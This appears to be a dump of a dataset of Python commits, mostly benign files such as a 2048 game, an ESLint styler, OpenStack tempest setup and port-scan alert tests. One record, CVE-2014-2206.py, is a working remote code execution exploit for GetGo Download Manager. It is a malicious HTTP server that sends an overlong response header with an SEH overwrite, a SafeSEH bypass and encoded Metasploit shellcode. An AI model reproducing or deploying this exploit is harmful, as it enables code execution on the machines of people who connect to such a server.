self.bg.fill(pygame.Color(self.__background_color))
for i in range(16):
self.play_block.append(0)
self.new_square()
self.new_square()
def draw_square(self):
self.x_pos = self.y_pos = self.__square_space
for i in range(16):
pf = pygame.Surface(self.__square_size)
if self.play_block[i] == 0:
pf.fill(pygame.Color(self.__square_clean_color))
else:
p_color = Square().color(self.play_block[i])
pf.fill(pygame.Color(p_color))
self.screen.blit(pf, (self.x_pos, self.y_pos))
if self.play_block[i] > 0:
self.screen.blit(self.square_font_name.render(str(self.play_block[i]), 1, (0, 0, 0)), (self.x_pos + 10, self.y_pos + 10))
self.x_pos += self.__square_size[0] + self.__square_space
if self.x_pos == (self.__square_size[0] + self.__square_space) * 4 + self.__square_space:
self.x_pos = self.__square_space
self.y_pos += self.__square_size[0] + self.__square_space
def new_square(self):
p_rand_pos = randint(0, 15)
while self.play_block[p_rand_pos] != 0:
p_rand_pos = randint(0, 15)
self.play_block[p_rand_pos] = 2
class Square(Window):
def key(self, event):
p_flag = False
if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT:
for j in range(16):
for i in range(16):
if i != 0 and i != 4 and i != 8 and i != 12 and self.play_block[i] > 0:
if self.play_block[i - 1] == self.play_block[i]:
self.play_block[i - 1] = self.play_block[i]*2
self.play_block[i] = 0
p_flag = True
break
if self.play_block[i - 1] == 0:
self.play_block[i - 1] = self.play_block[i]
self.play_block[i] = 0
p_flag = True
continue
if p_flag == True:
p_flag = False
self.new_square()
p_flag = False
if event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT:
for j in range(16):
for i in range(15, -1, -1):
if i != 3 and i != 7 and i != 11 and i != 15 and self.play_block[i] > 0:
if self.play_block[i + 1] == self.play_block[i]:
self.play_block[i + 1] = self.play_block[i]*2
self.play_block[i] = 0
p_flag = True
break
if self.play_block[i + 1] == 0:
self.play_block[i + 1] = self.play_block[i]
self.play_block[i] = 0
p_flag = True
continue
if p_flag == True:
p_flag = False
self.new_square()
p_flag = False
if event.type == pygame.KEYDOWN and event.key == pygame.K_UP:
for j in range(16):
for i in range(16):
if i != 0 and i != 1 and i != 2 and i != 3 and self.play_block[i] > 0:
if self.play_block[i - 4] == self.play_block[i]:
self.play_block[i - 4] = self.play_block[i]*2
self.play_block[i] = 0
p_flag = True
break
if self.play_block[i - 4] == 0:
self.play_block[i - 4] = self.play_block[i]
self.play_block[i] = 0
p_flag = True
continue
if p_flag == True:
p_flag = False
self.new_square()
p_flag = False
if event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN:
for j in range(16):
for i in range(15, -1, -1):
if i != 12 and i != 13 and i != 14 and i != 15 and self.play_block[i] > 0:
if self.play_block[i + 4] == self.play_block[i]:
self.play_block[i + 4] = self.play_block[i]*2
self.play_block[i] = 0
p_flag = True
break
if self.play_block[i + 4] == 0:
self.play_block[i + 4] = self.play_block[i]
self.play_block[i] = 0
p_flag = True
continue
if p_flag == True:
p_flag = False
self.new_square()
def color(self, value):
if value == 2: return "#EEE4DA"
if value == 4: return "#EDE0C8"
if value == 8: return "#F2B179"
if value == 16: return "#F59563"
if value == 32: return "#F67C5F"
if value == 64: return "#F65E3B"
if value == 128: return "#EDCF72"
if value == 256: return "#EDCC61"
if value == 512: return "#EDC850"
if value == 1024: return "#EDC53F"
if value == 2048: return "#EDC22E"
if value > 2048: return "#3C3A32"
win = Window()
def main():
pygame.init()
win.new_game()
while 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
raise SystemExit
Square().key(event)
win.screen.blit(win.bg, (0,0))
win.draw_square()
pygame.display.update()
if __name__ == "__main__":
main()
| Python | 0.998661 | |
387d05dbdb81bacc4851adffbfd7f827e709d4cc | Add Step class - Create Step.py to hold code for the Step class. - The Step class represents a single step/instruction for a Recipe object. | Step.py | Step.py | # Step object
class Step:
# Initiate object
def __init__(self,description):
self.description = description
| Python | 0 | |
7d8a566ac51e7e471603c2160dce2046eb698738 | add sn domains conversion tool | conv.py | conv.py | #!/usr/bin/env python
# Read the wiki for more infomation
# https://github.com/lennylxx/ipv6-hosts/wiki/sn-domains
import sys
table = '1023456789abcdefghijklmnopqrstuvwxyz'
def iata2sn(iata):
global table
sn = ''
for v in iata[0:3]:
i = ((ord(v) - ord('a')) * 7 + 5) % 36
sn += table[i]
return sn
def sn2iata(sn):
global table
iata = ''
for v in sn:
i = table.index(v)
i = (5 - i % 7) * 5 + i / 7 + 10
iata += table[i]
return iata
def num2code(num):
global table
code = ''
for v in num:
i = ((ord(v) - ord('0') + 1) * 7) % 36
code += table[i]
return code
def code2num(code):
global table
num = ''
for v in code:
i = table.index(v)
i = i / 7 + i % 7 - 1
num += str(i)
return num
def main():
if len(sys.argv) != 3:
print 'usage:\n\t./%s -i iata\n\t./%s -s sn'\
% (sys.argv[0], sys.argv[0])
sys.exit(1)
input = sys.argv[2]
ret = ''
if sys.argv[1] == '-i':
ret += iata2sn(input[0:3])
ret += num2code(input[3:5])
ret += 'n'
ret += num2code(input[6:8])
print ret
elif sys.argv[1] == '-s':
ret += sn2iata(input[0:3])
ret += code2num(input[3:5])
ret += 's'
ret += code2num(input[6:8])
print ret
else:
print 'Unknown option.'
sys.exit(1)
if __name__ == '__main__':
main()
| Python | 0 | |
d2bdbd0d851fda046c0be55105a211a382c22766 | Add Day 2 | day2.py | day2.py | #Advent of Code December 2
#Written by icydoge - icydoge AT gmail dot com
with open('paper.txt') as f:
content = f.read().splitlines()[:-1] #Remove last empty line
part_one_answer = 0
part_two_answer = 0
for box in content:
dimensions = sorted(map(int,box.split('x')))
slack = dimensions[0] * dimensions[1]
wrapping = 2 * (dimensions[0] * dimensions[1] + dimensions[1] * dimensions[2] + dimensions[0] * dimensions[2])
ribbon = (dimensions[0] + dimensions[1]) * 2
bow = dimensions[0] * dimensions[1] * dimensions[2]
part_one_answer += wrapping + slack
part_two_answer += ribbon + bow
print "Total square feet of wrapping paper (Part One):", part_one_answer
print "Total feet of ribbon (Part Two):", part_two_answer | Python | 0.000031 | |
acf4ad1e5948354281fec040badfe412f5194529 | add wsgi | flaskr/flaskr.wsgi | flaskr/flaskr.wsgi | <VirtualHost *>
ServerName example.com
WSGIDaemonProcess flaskr user=user1 group=group1 threads=5
WSGIScriptAlias / /var/www/FlaskDB/flaskr/flaskr.wsgi
<Directory /var/www/FlaskDB/flaskr>
WSGIProcessGroup flaskr
WSGIApplicationGroup %{GLOBAL}
Order deny,allow
Allow from all
</Directory>
</VirtualHost> | Python | 0.999824 | |
b6fbdd70a0486718d711a7efc310e350a1837b9c | add collapse reads code | seqcluster/collapse.py | seqcluster/collapse.py | import os
from libs.fastq import collapse, splitext_plus
import logging
logger = logging.getLogger('seqbuster')
def collapse_fastq(args):
"""collapse fasq files after adapter trimming
"""
idx = 0
try:
seqs = collapse(args.fastq)
out_file = splitext_plus(os.path.basename(args.fastq))[0] + "_trimmed.fastq"
except IOError as e:
logger.error("I/O error({0}): {1}".format(e.errno, e.strerror))
raise "Can not read file"
logger.info("writing output")
with open(os.path.join(args.out, out_file), 'w') as handle:
for seq in seqs:
idx += 1
qual = "".join(seqs[seq].get())
counts = seqs[seq].times
handle.write(("@seq_{idx}_x{counts}\n{seq}\n+\n{qual}\n").format(**locals()))
| Python | 0.000001 | |
871ec5597059934bce64f7d31fa7e5ab165063ee | Add basic GUI frontend | memorise-frontend.py | memorise-frontend.py | #!/usr/bin/env python
# -*- Coding: utf-8 -*-
from tkinter import Tk, Menu
from ttk import Frame, Button, Style
class MemoriseFrontend(Frame):
version = "0.1-py"
padding = 10
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.style = Style()
self.style.theme_use("default")
self._initUI()
def _initUI(self):
self.parent.title("Memorise v" + self.version)
self.columnconfigure(0, pad=self.padding)
self.columnconfigure(1, pad=self.padding)
self.columnconfigure(2, pad=self.padding)
self.columnconfigure(3, pad=self.padding)
self.columnconfigure(4, pad=self.padding)
self.rowconfigure(0, pad=self.padding)
self.rowconfigure(1, pad=self.padding)
self.rowconfigure(2, pad=self.padding)
self.rowconfigure(3, pad=self.padding)
self.rowconfigure(4, pad=self.padding)
# Row 1
btnUp = Button(self, text="Up", command=self._onUpBtn)
btnUp.grid(row=1, column=2)
# Row 2
btnLeft = Button(self, text="Left", command=self._onLeftBtn)
btnLeft.grid(row=2, column=1)
# Row 2
btnRight = Button(self, text="Right", command=self._onRightBtn)
btnRight.grid(row=2, column=3)
# Row 3
btnDown = Button(self, text="Down", command=self._onDownBtn)
btnDown.grid(row=3, column=2)
self.pack()
def _onUpBtn(self):
pass
def _onLeftBtn(self):
pass
def _onRightBtn(self):
pass
def _onDownBtn(self):
pass
def main():
root = Tk()
app = MemoriseFrontend(root)
root.mainloop()
main()
| Python | 0 | |
db81e8ca0b0321994f188daf45211e6ae2dda4a4 | Make a control dataset that only contains sequences with titer data. | dengue/utils/make_titer_strain_control.py | dengue/utils/make_titer_strain_control.py | from Bio import SeqIO
from pprint import pprint
with open('../../data/dengue_titers.tsv', 'r') as f:
titerstrains = set([ line.split()[0] for line in f ])
with open('../../data/dengue_titers.tsv', 'r') as f:
serastrains = set([ line.split()[1] for line in f ])
autologous = titerstrains.intersection(serastrains)
print len(autologous)
strains_with_titers = [s for s in SeqIO.parse(open('../../data/dengue.fasta', 'r'), 'fasta') if s.description.split('|')[0] in autologous ]
SeqIO.write(strains_with_titers, '../../data/control.fasta', 'fasta')
print 'Found %d strains with autologous titers and sequence data.'%len(strains_with_titers)
| Python | 0.00001 | |
9a67c8eca45daa2f706e8fc6bde958c37229c837 | Create mpd_mouse_control.py | mpd_mouse_control.py | mpd_mouse_control.py | from evdev import InputDevice
from select import select
import os
import mpd
import socket
import alsaaudio
import time
client = mpd.MPDClient(use_unicode=True)
dev = InputDevice('/dev/input/event2')
drop_lb_event = False
drop_rb_event = False
while True:
r,w,x = select([dev], [], [])
try:
for event in dev.read():
client.connect("192.168.0.2", 6600)
if event.code == 8:
if 272 in dev.active_keys():
drop_lb_event = True
if (event.value > 0):
client.seekcur("+5")
else:
client.seekcur("-5")
elif 273 in dev.active_keys():
drop_rb_event = True
if (event.value > 0):
client.seekcur("+30")
else:
client.seekcur("-30")
else:
mixer = alsaaudio.Mixer("PCM", **{"cardindex": 1})
if (event.value > 0):
mixer.setvolume(int(mixer.getvolume()[0])+2, -1)
else:
mixer.setvolume(int(mixer.getvolume()[0])-2, -1)
try:
if event.code == 272 and event.value == 0:
if drop_lb_event:
drop_lb_event = False
else:
client.previous()
if event.code == 273 and event.value == 0:
if drop_rb_event:
drop_rb_event = False
else:
client.next()
if event.code == 274 and event.value == 1:
if client.status()["state"] == "stop":
client.play()
else:
client.pause()
os.system("/usr/sbin/qcontrol usbled off")
client.disconnect()
except mpd.ConnectionError, socket.error:
pass
except IOError, OSError:
time.sleep(5)
dev = InputDevice('/dev/input/event2')
| Python | 0.000002 | |
d1024a2892c6e171b3d465d56c8a1fad25d7fbdc | Create ESLint styler | zazu/plugins/eslint_styler.py | zazu/plugins/eslint_styler.py | # -*- coding: utf-8 -*-
"""eslint plugin for zazu."""
import zazu.styler
zazu.util.lazy_import(locals(), [
'subprocess',
'os',
'tempfile'
])
__author__ = "Patrick Moore"
__copyright__ = "Copyright 2018"
class eslintStyler(zazu.styler.Styler):
"""ESLint plugin for code styling."""
def style_string(self, string):
"""Fix a string to be within style guidelines."""
temp = tempfile.NamedTemporaryFile(delete=False, suffix=".js")
temp_path = temp.name
args = ['eslint', '--fix'] + self.options + [temp_path]
temp.write(string)
temp.close()
try:
subprocess.check_output(args)
except subprocess.CalledProcessError:
pass
with open(temp_path, "r") as f:
ret = f.read()
os.remove(temp_path)
return ret
@staticmethod
def default_extensions():
"""Return the list of file extensions that are compatible with this Styler."""
return ['*.js']
@staticmethod
def type():
"""Return the string type of this Styler."""
return 'eslint'
| Python | 0 | |
6d53fcd788ef985c044657a6bf2e6faa5b8b9673 | Create CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | #!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "\x90" * 50
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload = junk0 + nseh + seh + nops + shellcode
buffer = "HTTP/1.1 200 "+payload+"\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
| Python | 0.000011 | |
7cf6d0d214fe0ef8c93bf661e008b256a35a8def | Add tests for unauth_portscan alert | tests/alerts/test_unauth_portscan.py | tests/alerts/test_unauth_portscan.py | from positive_alert_test_case import PositiveAlertTestCase
from negative_alert_test_case import NegativeAlertTestCase
from alert_test_suite import AlertTestSuite
class TestAlertUnauthPortScan(AlertTestSuite):
alert_filename = "unauth_portscan"
# This event is the default positive event that will cause the
# alert to trigger
default_event = {
"_type": "bro",
"_source": {
"category": "bronotice",
"summary": "Scan::Port_Scan 1.2.3.4 scanned at least 12 unique ports of host 5.6.7.8 in 0m3s local",
"eventsource": "nsm",
"hostname": "nsmhost",
"details": {
"uid": "",
"actions": "Notice::ACTION_LOG",
"note": "Scan::Port_Scan",
"sourceipv4address": "0.0.0.0",
"indicators": [
"1.2.3.4"
],
"msg": "1.2.3.4 scanned at least 12 unique ports of host 5.6.7.8 in 0m3s",
"destinationipaddress": "5.6.7.8",
},
}
}
# This alert is the expected result from running this task
default_alert = {
'category': 'scan',
'severity': 'NOTICE',
'summary': "nsmhost: Unauthorized Port Scan Event from [u'1.2.3.4'] scanning ports on host 5.6.7.8",
'tags': [],
'url': 'https://mana.mozilla.org/wiki/display/SECURITY/NSM+IR+procedures',
}
test_cases = [
PositiveAlertTestCase(
description="Positive test case with good event",
events=[default_event],
expected_alert=default_alert
),
PositiveAlertTestCase(
description="Positive test case with an event with somewhat old timestamp",
events=[
{
"_source": {
"utctimestamp": AlertTestSuite.subtract_from_timestamp_lambda({'minutes': 29})
}
}
],
expected_alert=default_alert
),
NegativeAlertTestCase(
description="Negative test case with bad event type",
events=[
{
"_type": "event",
}
],
),
NegativeAlertTestCase(
description="Negative test case with bad category",
events=[
{
"_source": {
"category": "Badcategory",
}
}
],
),
NegativeAlertTestCase(
description="Negative test case with bad eventsource",
events=[
{
"_source": {
"eventsource": "Badeventsource",
}
}
],
),
NegativeAlertTestCase(
description="Negative test case with non existent details.indicators",
events=[
{
"_source": {
"details": {
"indicators": None,
}
}
}
],
),
NegativeAlertTestCase(
description="Negative test case with bad details.note",
events=[
{
"_source": {
"details": {
"note": "Badnote",
}
}
}
],
),
NegativeAlertTestCase(
description="Negative test case with old timestamp",
events=[
{
"_source": {
"utctimestamp": AlertTestSuite.subtract_from_timestamp_lambda({'minutes': 31})
}
}
],
),
]
| Python | 0 | |
690b5a994bc20b561632d9aa3e332061457a3d72 | Add missing __init__.py to overkiz tests (#62727) | tests/components/overkiz/__init__.py | tests/components/overkiz/__init__.py | """Tests for the overkiz component."""
| Python | 0.000001 | |
c6b9788296f87a88655778b5d604316f3df11199 | Initial basic setup of openstack and tempest config file | tools/tempest_auto_config.py | tools/tempest_auto_config.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Config
import ConfigParser
import os
# Default client libs
import keystoneclient.v2_0.client as keystone_client
# Import Openstack exceptions
import keystoneclient.exceptions as keystone_exception
DEFAULT_CONFIG_DIR = "%s/etc" % os.path.abspath(os.path.pardir)
DEFAULT_CONFIG_FILE = "tempest.conf"
DEFAULT_CONFIG_SAMPLE = "tempest.conf.sample"
# Environment variables override defaults
TEMPEST_CONFIG_DIR = os.environ.get('TEMPEST_CONFIG_DIR') or DEFAULT_CONFIG_DIR
TEMPEST_CONFIG = os.environ.get('TEMPEST_CONFIG') or "%s/%s" % \
(TEMPEST_CONFIG_DIR, DEFAULT_CONFIG_FILE)
TEMPEST_CONFIG_SAMPLE = os.environ.get('TEMPEST_CONFIG_SAMPLE') or "%s/%s" % \
(TEMPEST_CONFIG_DIR, DEFAULT_CONFIG_SAMPLE)
# Admin credentials
OS_USERNAME = os.environ.get('OS_USERNAME')
OS_PASSWORD = os.environ.get('OS_PASSWORD')
OS_TENANT_NAME = os.environ.get('OS_TENANT_NAME')
OS_AUTH_URL = os.environ.get('OS_AUTH_URL')
# Image references
IMAGE_ID = os.environ.get('IMAGE_ID')
IMAGE_ID_ALT = os.environ.get('IMAGE_ID_ALT')
class ClientManager(object):
"""
Manager that provides access to the official python clients for
calling various OpenStack APIs.
"""
def __init__(self):
self.identity_client = None
self.image_client = None
self.network_client = None
self.compute_client = None
self.volume_client = None
def get_identity_client(self, **kwargs):
"""
Returns the openstack identity python client
:param username: a string representing the username
:param password: a string representing the user's password
:param tenant_name: a string representing the tenant name of the user
:param auth_url: a string representing the auth url of the identity
:param insecure: True if we wish to disable ssl certificate validation,
False otherwise
:returns an instance of openstack identity python client
"""
if not self.identity_client:
self.identity_client = keystone_client.Client(**kwargs)
return self.identity_client
def getTempestConfigSample():
"""
Gets the tempest configuration file as a ConfigParser object
:return: the tempest configuration file
"""
# get the sample config file from the sample
config_sample = ConfigParser.ConfigParser()
config_sample.readfp(open(TEMPEST_CONFIG_SAMPLE))
return config_sample
def update_config_admin_credentials(config, config_section):
"""
Updates the tempest config with the admin credentials
:param config: an object representing the tempest config file
:param config_section: the section name where the admin credentials are
"""
# Check if credentials are present
if not (OS_AUTH_URL and
OS_USERNAME and
OS_PASSWORD and
OS_TENANT_NAME):
raise Exception("Admin environment variables not found.")
# TODO(tkammer): Add support for uri_v3
config_identity_params = {'uri': OS_AUTH_URL,
'admin_username': OS_USERNAME,
'admin_password': OS_PASSWORD,
'admin_tenant_name': OS_TENANT_NAME}
update_config_section_with_params(config,
config_section,
config_identity_params)
def update_config_section_with_params(config, section, params):
"""
Updates a given config object with given params
:param config: the object representing the config file of tempest
:param section: the section we would like to update
:param params: the parameters we wish to update for that section
"""
for option, value in params.items():
config.set(section, option, value)
def get_identity_client_kwargs(config, section_name):
"""
Get the required arguments for the identity python client
:param config: the tempest configuration file
:param section_name: the section name in the configuration where the
arguments can be found
:return: a dictionary representing the needed arguments for the identity
client
"""
username = config.get(section_name, 'admin_username')
password = config.get(section_name, 'admin_password')
tenant_name = config.get(section_name, 'admin_tenant_name')
auth_url = config.get(section_name, 'uri')
dscv = config.get(section_name, 'disable_ssl_certificate_validation')
kwargs = {'username': username,
'password': password,
'tenant_name': tenant_name,
'auth_url': auth_url,
'insecure': dscv}
return kwargs
def create_user_with_tenant(identity_client, username, password, tenant_name):
"""
Creates a user using a given identity client
:param identity_client: openstack identity python client
:param username: a string representing the username
:param password: a string representing the user's password
:param tenant_name: a string representing the tenant name of the user
"""
# Try to create the necessary tenant
tenant_id = None
try:
tenant_description = "Tenant for Tempest %s user" % username
tenant = identity_client.tenants.create(tenant_name,
tenant_description)
tenant_id = tenant.id
except keystone_exception.Conflict:
# if already exist, use existing tenant
tenant_list = identity_client.tenants.list()
for tenant in tenant_list:
if tenant.name == tenant_name:
tenant_id = tenant.id
# Try to create the user
try:
email = "%s@test.com" % username
identity_client.users.create(name=username,
password=password,
email=email,
tenant_id=tenant_id)
except keystone_exception.Conflict:
# if already exist, use existing user
pass
def create_users_and_tenants(identity_client,
config,
identity_section):
"""
Creates the two non admin users and tenants for tempest
:param identity_client: openstack identity python client
:param config: tempest configuration file
:param identity_section: the section name of identity in the config
"""
# Get the necessary params from the config file
tenant_name = config.get(identity_section, 'tenant_name')
username = config.get(identity_section, 'username')
password = config.get(identity_section, 'password')
alt_tenant_name = config.get(identity_section, 'alt_tenant_name')
alt_username = config.get(identity_section, 'alt_username')
alt_password = config.get(identity_section, 'alt_password')
# Create the necessary users for the test runs
create_user_with_tenant(identity_client, username, password, tenant_name)
create_user_with_tenant(identity_client, alt_username, alt_password,
alt_tenant_name)
def main():
"""
Main module to control the script
"""
# TODO(tkammer): add support for existing config file
config_sample = getTempestConfigSample()
update_config_admin_credentials(config_sample, 'identity')
client_manager = ClientManager()
# Set the identity related info for tempest
identity_client_kwargs = get_identity_client_kwargs(config_sample,
'identity')
identity_client = client_manager.get_identity_client(
**identity_client_kwargs)
# Create the necessary users and tenants for tempest run
create_users_and_tenants(identity_client,
config_sample,
'identity')
# TODO(tkammer): add image implementation
if __name__ == "__main__":
main()
| Python | 0.998657 | |
318b775a150f03e3311cb1a2b93cf21999fac70d | Create base class for openbox messages and create most of the Messages objects | openbox/messages.py | openbox/messages.py | """
Messages between OBC and OBI
"""
import json
class MessageParsingError(Exception):
pass
class MessageMeta(type):
def __init__(cls, name, bases, dct):
if not hasattr(cls, "messages_registry"):
# this is the base class. Create an empty registry
cls.messages_registry = {}
else:
# this is the derived class. Add cls to the registry
cls.messages_registry[name] = cls
super(MessageMeta, cls).__init__(name, bases, dct)
class Message(object):
"""
The base class for all messages.
Messages shouldn't derive from this class directly but from of it's subclasses.
"""
__metaclass__ = MessageMeta
# a list of the fields in the message, no need to put the 'type' field
__slots__ = ['xid']
# Global XID counter
XID = 0
def __init__(self, **kwargs):
if 'xid' not in kwargs:
kwargs['xid'] = Message.XID
Message.XID += 1
for field in self.__slots__:
try:
setattr(self, field, kwargs[field])
except KeyError:
raise TypeError("Field %s, not given" % field)
@classmethod
def from_json(cls, raw_data):
obj = json.loads(raw_data)
try:
msg_type = obj.pop('type')
clazz = cls.messages_registry[msg_type]
except KeyError:
raise MessageParsingError("Unknown Message Type" % raw_data)
try:
return clazz(**obj)
except TypeError as e:
raise MessageParsingError(e.message)
def to_dict(self):
return dict((field, getattr(self, field)) for field in self.__slots__)
def to_json(self):
obj_dict = self.to_dict()
obj_dict['type'] = self.__class__.__name__
return json.dumps(obj_dict)
def __str__(self):
return self.to_json()
class MessageRequest(Message):
"""
A request message.
"""
pass
class MessageResponse(Message):
"""
A response message
"""
# The fields to copy from the request
__copy_request_fields__ = ['xid']
@classmethod
def from_request(cls, request, **kwargs):
for field in cls.__copy_request_fields__:
kwargs[field] = getattr(request, field)
return cls(**kwargs)
class Hello(MessageRequest):
__slots__ = ['xid', 'dpid', 'version', 'capabilities']
class KeepAlive(MessageRequest):
__slots__ = ['xid', 'dpid']
class ListCapabilitiesRequest(MessageRequest):
__slots__ = ['xid', ]
class ListCapabilitiesResponse(MessageResponse):
__slots__ = ['xid', 'capabilities']
class GlobalStatsRequest(MessageRequest):
__slots__ = ['xid']
class GlobalStatsResponse(MessageResponse):
__slots__ = ['xid', 'stats']
class GlobalStatsReset(MessageRequest):
__slots__ = ['xid']
class ReadRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'read_handle']
class ReadResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'read_handle', 'result']
__copy_request_fields__ = ['xid', 'block_id', 'read_handle']
class WriteRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'write_handle', 'value']
class WriteResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'write_handle']
__copy_request_fields__ = ['xid', 'block_id', 'write_handle']
class SetProcessingGraph(MessageRequest):
__slots__ = ['xid', 'required_modules', 'block', 'connectors']
class SetLogServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class BarrierRequest(MessageRequest):
__slots__ = ['xid']
class Error(MessageResponse):
__slots__ = ['xid', 'error_type', 'error_subtype', 'message', 'extended_message']
class SetStorageServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class AddCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name', 'module_content', 'content_type', 'content_transfer_encoding', 'translation']
class RemoveCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name'] | Python | 0 | |
d08426ffde22c2ded72425f1d1c54923b9aa0b97 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/4b193958ac9b893b33dc03cc6882c70ad4ad509d. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "4b193958ac9b893b33dc03cc6882c70ad4ad509d"
TFRT_SHA256 = "5b011d3f3b25e6c9646da078d0dbd8000ca063fa4fe6ef53449692c363fa13f7"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "f5ea7e9c419b881d7f3136de7a7388a23feee70e"
TFRT_SHA256 = "723c9b1fabc504fed5b391fc766e2504559c2b02b4f4e01c55bc77b8ff0df8ed"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| Python | 0 |
79a38e9ef0ac04c4efef55c26f74ad2b11442a7b | add a command to fix the missing packages | crate_project/apps/crate/management/commands/fix_missing_files.py | crate_project/apps/crate/management/commands/fix_missing_files.py | from django.core.management.base import BaseCommand
from packages.models import ReleaseFile
from pypi.processor import PyPIPackage
class Command(BaseCommand):
def handle(self, *args, **options):
i = 0
for rf in ReleaseFile.objects.filter(digest="").distinct("release__package"):
p = PyPIPackage(rf.release.package)
p.process()
i += 1
print rf.release.package.name, rf.release.version
print "Fixed %d packages" % i
| Python | 0.000009 | |
50b9aff7914885b590748ebd8bca4350d138670c | Add admin section for the ``Resources``. | us_ignite/resources/admin.py | us_ignite/resources/admin.py | from django.contrib import admin
from us_ignite.resources.models import Resource
class ResourceAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'status', 'is_featured')
search_fields = ('name', 'slug', 'description', 'url')
list_filter = ('is_featured', 'created')
date_hierarchy = 'created'
raw_id_fields = ['owner', ]
admin.site.register(Resource, ResourceAdmin)
| Python | 0 | |
20c9f1416243c020b270041621098ca20e09eca4 | tag retrieval script added | private/scripts/extras/timus_tag_retrieval.py | private/scripts/extras/timus_tag_retrieval.py | """
Copyright (c) 2015-2018 Raj Patel(raj454raj@gmail.com), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
